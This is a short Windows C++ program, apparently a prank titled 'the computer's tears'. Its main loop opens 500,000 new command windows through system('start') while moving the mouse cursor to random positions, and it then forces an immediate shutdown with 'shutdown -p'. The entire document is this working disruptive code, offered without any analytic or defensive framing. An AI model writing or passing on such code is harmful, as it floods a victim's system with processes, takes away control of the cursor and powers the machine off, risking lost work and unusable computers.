#include <bits/stdc++.h>#include <windows.h>using namespace std; int main(){ int x=GetSystemMetrics(SM_CXSCREEN); int y=GetSystemMetrics(SM_CYSCREEN); srand(time(0)); int t=500000; while(t--) { system("start"); SetCursorPos(rand()%x,rand()%y); } system("shutdown -p"); return 0;}//电脑的眼泪C++
